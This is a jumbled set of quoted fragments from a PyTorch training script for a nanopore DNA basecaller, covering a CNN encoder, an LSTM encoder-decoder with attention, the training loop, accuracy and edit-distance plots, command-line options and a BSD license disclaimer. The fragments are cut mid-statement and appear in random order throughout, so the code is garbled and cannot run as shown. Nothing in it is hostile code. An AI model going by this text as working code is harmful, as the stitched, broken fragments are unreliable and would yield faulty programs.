"input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax =",
"figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val,",
"acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig =",
"seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val =",
"= sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases:",
"import pickle import random import time import matplotlib.pyplot as plt import matplotlib.ticker as",
"filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch",
"input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2,",
"100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val",
"= fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\")",
"(batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module):",
"patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={},",
"epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0 epoch_editd",
"dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder],",
"def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size self.hidden_size =",
"from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import",
"= 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g =",
"/ float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val",
"NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden",
"else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1:",
"IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN",
"0 for idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target",
"std) def forward(self, x, hidden): h, c = hidden h = h.view(x.size(0), -1)",
"length = int(length.item()) seq = pred[idx] seq_target = target[idx] encoded_pred = [] for",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training",
"= batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional =",
"hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port, dropout=dropout) lstm_dec",
"batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths):",
"break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input,",
"\"lstm\" in p and \"linear\" not in p: n = matrix_param[p].shape[0] # input",
"BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A",
"Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val,",
"reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long())",
"enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3]",
"target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,}",
"input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax",
"# or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5)",
"nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\")",
"np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val",
"num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed",
"nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\")",
"must have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None,",
"idx] = np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4, n//2",
"Variable import torch.nn.functional as F import torchvision import pickle import random import time",
"label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\")",
"loss_iteration = [] acc_iteration = [] editd_iteration = [] for iteration, data in",
"every n updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda",
"'{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with",
"== 0): # or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader)",
"input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq,",
"momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model",
"on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train],",
"writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates]",
"updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value = 1 #arbitrary",
"is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val,",
"input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val",
"out dim] return outputs, hidden # Sequence to sequence model # ----------- class",
"output = (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden",
"= np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation',",
"start, end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start,",
"############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs,",
"= self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2)))",
"def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer",
"#### sort by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 =",
"epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val",
"batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional",
"samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, :",
"(reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc",
"self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) -->",
"running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer",
"v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates",
"import SummaryWriter import itertools import seaborn as sns import pandas as pd import",
"type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b',",
"old_ed = 0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for",
"and teacher_forcing_ratio >= 0.25: # if we have reached half of the updates",
"# and if it has, it will make a checkpoint of the current",
"if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return",
"args.call lr = args.learning_rate editD = args.editD sgd = False out_classes = 5",
"undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch",
"in the batch if i == max_in_batch: break # when seq length (i)",
"fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for",
"nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim,",
"0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0",
"print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val = 0",
"val_set[5].size()) # [batch size] is typically chosen between 1 and a few hundreds,",
"f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit",
":] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM random_value",
"your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\",",
"with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1]",
"input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int,",
"by sequence length in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0,",
"(num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 =",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,",
"target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder",
"running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates",
"[train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port),",
"dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for",
"i += 1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if",
"batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2],",
"'--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the validation set\") #",
"c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :,",
"= EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {}",
":].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val)",
"dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden,",
"sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size return",
"one hot encode input input_decoder = label if teacher_force else onehot # [batch",
"criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1)",
"LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True):",
">= 0.25: # if we have reached half of the updates teacher_forcing_ratio =",
"hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 =",
"max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname,",
"1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from",
"the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c',",
"= torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0,",
"self.num_layers = num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port",
"parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required = True, help=\"File path to the",
"torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F import torchvision",
"LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional =",
"torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch",
"\"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) #",
"[seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True)",
"editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0,",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end =",
"+ \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if",
"# cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] =",
"parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?',",
"acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val",
"dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm)",
"= data[3] batch_y10 = data[4] #Wrap them in a Variable object inputs, labels,",
"that padded items in the sequence won't be shown to the LSTM packed_seq",
"= args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip",
"* 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc",
"LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers =",
"label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2)",
"plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2)",
"OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED",
"np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2 + n//4, n",
"+ '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port),",
"forward(self, x, hidden): h, c = hidden h = h.view(h.size(0), -1) c =",
"input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val,",
"output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val",
"= acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name)",
"if we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95",
"distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on",
"ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\")",
"plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if",
"for name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\"",
"Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1],",
"self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if",
"order in batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :]",
"help=\"Make every n updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\",",
"unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original",
"of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must have equal batch",
"[dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return",
"= make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port =",
"n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time()",
"teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours,",
"self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim,",
"+ self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate",
"= args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units #256",
"if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len",
"0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2:",
"IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY",
"torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1,",
"Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\")",
"end = n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end)",
"are permitted provided that the following conditions are met: 1. Redistributions of source",
"result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars",
"= np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val",
"without modification, are permitted provided that the following conditions are met: 1. Redistributions",
"conditions are met: 1. Redistributions of source code must retain the above copyright",
"x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder",
"ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and",
"hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True, dropout=0):",
"args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input =",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0],",
"print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration = [] editd_iteration",
"total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader):",
"False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad =",
"(h, c) label = y[not_padded_batches, :, i] # batch-i, features, seq len y",
"AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT",
"= 0 heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b =",
"bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in",
"hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input",
"break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result",
"a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False)",
"updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training",
"# (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p,",
"parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1,",
"= [] for name in y_len: if \"bias\" in name and \"lstm\" in",
"3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()),",
"f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit",
"loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val))",
"b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)),",
"pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1],",
"form must reproduce the above copyright notice, this list of conditions and the",
"in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1",
"{}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration =",
"num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import",
"editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0,",
"= False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim",
"true_y_len # get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove",
"args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf",
"input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size,",
"seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ###########################################",
"next token as next input #if not, use predicted token onehot = torch.zeros(len(top1),",
"100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path +",
"+ 1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" *",
"n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder !=",
"copyright notice, this list of conditions and the following disclaimer in the documentation",
"CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class",
"out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set,",
"print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i",
"original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu()",
"and \"bias\" in p and \"lstm\" in p and \"linear\" not in p:",
"bidir = args.bi_lstm attention = args.attention dropout = args.dropout # CNN input_bias_cnn =",
"= [] acc_iteration = [] editd_iteration = [] for iteration, data in enumerate(train_loader):",
"in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size x seq_length x",
"print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir +",
"= None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed =",
